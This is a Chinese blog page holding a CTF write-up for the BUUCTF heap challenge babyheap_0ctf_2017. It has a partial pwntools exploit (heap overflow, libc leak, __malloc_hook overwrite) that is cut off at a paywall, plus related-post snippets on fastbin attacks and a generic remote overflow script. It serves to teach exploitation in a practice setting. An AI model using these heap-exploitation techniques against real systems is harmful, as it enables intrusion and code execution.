[BUUCTF]-PWN:babyheap_0ctf_2017解析

已于 2024-02-02 03:55:14 修改
阅读量1.1k 收藏 22
点赞数 28
分类专栏: PWN 文章标签: 网络安全
于 2024-01-10 03:24:25 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2301_79326813/article/details/135492194
版权

这是一道关于堆的题目,我们先看一下保护

可以知道保护全开,64位,再看ida

这里就不作过多的解释了,大致就是alloc(创造堆块)、fill(填充堆块内容)、free(释放堆块)、dump(输出堆块内容)

解题的思路可以分为两步,第一步是利用unsortedbin的特性泄露出mainare+88的地址,进而求出libc,第二步就是伪造堆块和利用malloc_hook的特性getshell。

先来详细讲讲第一步,第一步exp如下

from pwn import*
from LibcSearcher import*
context(log_level='debug',arch='amd64')
p=process('./babyheap')
#p=remote('node5.buuoj.cn',27442)
def alloc(size):
    p.sendlineafter(b'Command:',str(1))
    p.sendlineafter(b'Size:',str(size))

def fill(index,size,content):
    p.sendlineafter(b'Command:',str(2))
    p.sendlineafter(b'Index:',str(index))
    p.sendlineafter(b'Size:',str(size))
    p.sendafter(b'Content:',content)

def free(index):
    p.sendlineafter(b'Command:',str(3))
    p.sendlineafter(b'Index:',str(index))

def dump(index):
    p.sendlineafter(b'Command:',str(4))
    p.sendlineafter(b'Index:',str(index))

alloc(0x10)
alloc(0x10)
alloc(0x10)
alloc(0x10)
alloc(0x80)
free(1)
free(2)
payload=p64(0)*3+p64(0x21)&
最低0.47元/天 解锁文章
BUUCTF-babyheap_0ctf_2017
Rt1Text的博客
11-27 879
标准堆菜单。
[BUUCTF]-PWN:ciscn_2019_es_7解析(系统调用execve,srop)
2301_79326813的博客
01-30 537
这道题好像和buu的ciscn_2019_s_3是一模一样的看保护64位,没开canary和pie看ida题目还有能往rax传递0x3B和0xf的函数,这就提示我们可以用系统调用来getshell。
buuctf babyheap_0ctf_2017
carol2358的博客
05-06 895
主体函数 我们可以在fill里发现可以任意输入字节 接下来我们就用chunk extend和off by one 图片来自 https://bbs.pediy.com/thread-246786.htm 具体看exp exp: from pwn import * #p=process('./babyheap_0ctf_2017') e=ELF('/lib/x86_64-linux-gn...
BUUCTF Pwn babyheap_0ctf_2017 Unsorted bin attack部分
最新发布
qq_33348179的博客
03-18 210
可以在编辑堆的时候重新设置大小 存在堆溢出。delete函数的指针清零了 无UAF。开启了全保护 64位。
[BUUCTF] babyheap_0ctf_2017
红叶的博客
03-28 1227
有点回想起当初第一次拿到flag时的感觉,继续加油。 本题考察知识点:**Fastbin Attack** 与 **Unsorted Bin Attack。** 通过使用Fastbin Attack与堆溢出漏洞,我们可以绕过Free后指针置零,从而达到在置零指针后获取堆块fd指针。 通过Unsorted Bin Attack,我们可以泄露Libc地址。 然后我们再使用Fastbin Attack替换__malloc_hook 本文写给自己,也写给跟我一样全网寻找详细解答的师傅们。
[BUUCTF]PWN——babyheap_0ctf_2017
mcmuyanga的博客
12-23 4113
[BUUCTF]PWN19——babyheap_0ctf_2017 附件 步骤: 例行检查,64位,保护全开 试运行一下程序,看到这个布局菜单,知道了这是一道堆的题目,第一次接触堆的小伙伴可以去看一下这个视频,我也刚接触堆不久,有些地方我也讲不清楚 ida载入,先看一下main函数,做堆题的时候需要将程序给理清楚了,这边的几个选项函数一开始不是如图所示的,我们可以右击给他重新命名一下,为了让我们看的更清楚 add,就是简单的创建一个chunk edit,我们写入数据的长度是我们可以自己控制的,存在堆
BUUCTF(pwn) babyheap_0ctf_2017
半岛铁盒的博客
07-30 313
入门堆题 main菜单 add edit edit,我们写入数据的长度是我们可以自己控制的,我们可以利用这点溢出到另一个堆块上 free,普通的释放chunk的过程 show 利用过程:堆溢出,可以通过重叠堆来泄露libc 分为两步: 第一次先泄露 libc 地址, 第二次利用fastbin attack,修改malloc_hook为one_gadget from pwn import * context.log_level = 'debug' p=remote("node4.buuoj.c
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
BUUCTF-pwn2_sctf_2016
weixin_44145820的博客
03-06 1111
这题利用的是负数转无符号数造成缓冲区溢出,以及泄露libc基地址执行ROP 题目分析 由于NX开启,我们考虑使用ROP,Canary没有打开使得这题变得很方便 下面是vuln函数: 在该函数中,程序读入一个字符串并转化为带符号整形(signed int),这时,如果我们输入负数可以避开不能大于32的检查 在get_n函数中,读入长度被强制转换为unsigned int,此时-1变成了42949...
babyheap_0ctf_2017
z1r0的博客
12-06 324
babyheap_0ctf_2017 查看保护 edit的时候可以重新输入size,这时写入content时可以堆溢出。因为size变得可控。 使用堆重叠先把libc_base给泄露出来。然后改fd给它分配到hook附近(2.23会检测size,所以可以使用malloc_hook - 0x23那里的0x7f),改hook为one_gadget。 具体的堆重叠(overlapping)方法见https://www.z1r0.top/ from pwn import * context(arch='am
0ctf Babyheap 2017
Bill
03-11 6611
0ctf 2017 BabyHeap 1. 题目分析 Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled 如果RELRO: Partial RELRO, 有可能是格式化字符串。 结论...
BUUCTF - PWNbabyheap_0ctf_2017
古月浪子的博客
04-05 2715
checksec一下,堆题果然是保护全开 IDA打开看看,首先mmap一块随机区域,用于存放我们申请的块的属性,然后输出菜单,有allocate、fill、free、dump功能 可以注意到,在创建堆的时候,将堆的地址和大小存放在了mmap的区域中,并且使用的是calloc,会将申请的内存区域清零 漏洞点在fill函数中,没有限制输入内容的长度,从而可以堆溢出 删除堆后会将指针置零 输出...
0ctf_2017_babyheap
u014377094的博客
03-10 550
本人double free+fastbin攻击第一道题,看了两天,好在理解下来不难。 参考传送门[分享]0ctf2017 - babyheap-Pwn-看雪论坛-安全社区|安全招聘|bbs.pediy.com 惯例checksec一下 打开ida 1创建chunk,按1,2依次创建,2往里写,3free掉指定数字chunk,4print出指定chunk内容 不建议跟ida里一些函数死磕,硬读会恶心到,理解就ok。 这里先放exp,读一遍exp咱们再来解释 from pwn import
0ctf_2017_babyheap详解
像初雪一样自由洒落
04-19 4423
本文主要列出0ctf_2017_babyheap的详细过程 主要参考:https://bbs.pediy.com/thread-223461.htm 程序流程 allocate:申请size大小的块 fill:对idx的块,设置size,并填入content free:释放idx的块 dump:打印idx的块内容 漏洞分析 fill中的size可以重新设置,故可以造成堆溢出。 方法:fastbin attack double free泄露libc 【small/large chunk释放,fd和.
babyheap_0_ctf_2017
m0_48127441的博客
04-01 286
漏洞就是劫持程序控制流 先对程序进行分析 alloc(Length) //struct a_malloc{int use_or_not; int Length;void*base;int un_use} ; struct a_malloc malloc_array[16]; fill(任意长度) free(指定块) dump(输出对应chunk的Length)//可以填充任意长度的数据,即可以修改 chunk头 目标 -->劫持程序控制流 --> 把__malloc_hoo...
buuctf-pwn入门
01-26
### BUUCTF PWN 类题目入门教程 #### 学习资源推荐 对于希望进入PWN挑战领域的新手来说,选择合适的教材和平台至关重要。王爽老师的《汇编语言》提供了基础理论支持,有助于理解底层操作原理[^1]。此外,《IDA Pro权威指南》能够帮助掌握逆向工程工具的使用技巧,这对解决PWN问题非常有帮助[^1]。 #### 实践平台建议 为了更好地练习技能并应用所学知识,在线实践环境不可或缺。BuuOJ是一个专门为CTF爱好者设计的学习与交流社区,其中包含了大量针对不同难度级别的PWN题目供玩家尝试解答[^2]。通过不断做题积累经验,可以逐步提高自己的技术水平。 #### 解决方案流程概述 当面对具体的PWN题目时,通常遵循以下几个步骤来构建解决方案: - **检测保护机制**:利用`checksec`命令查看目标程序启用了哪些安全防护措施; - **静态分析**:借助IDA Pro等反汇编器对二进制文件进行深入剖析,找出潜在漏洞点; - **编写Exploit脚本**:基于发现的安全缺陷精心构造攻击载荷; - **测试验证**:最后一步是在本地环境中反复调试直至成功获取Flag。 ```bash # 使用 checksec 工具检查可执行文件的安全特性 $ checksec ./vuln_program ``` ```python from pwn import * # 连接到远程服务器上的服务端口 conn = remote('example.com', 9999) # 发送恶意输入数据给存在缓冲区溢出漏洞的服务进程 payload = b'A' * offset + pack(address) conn.sendline(payload) # 接收返回的数据包以确认是否获得shell访问权限 response = conn.recv() print(response.decode()) ```
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值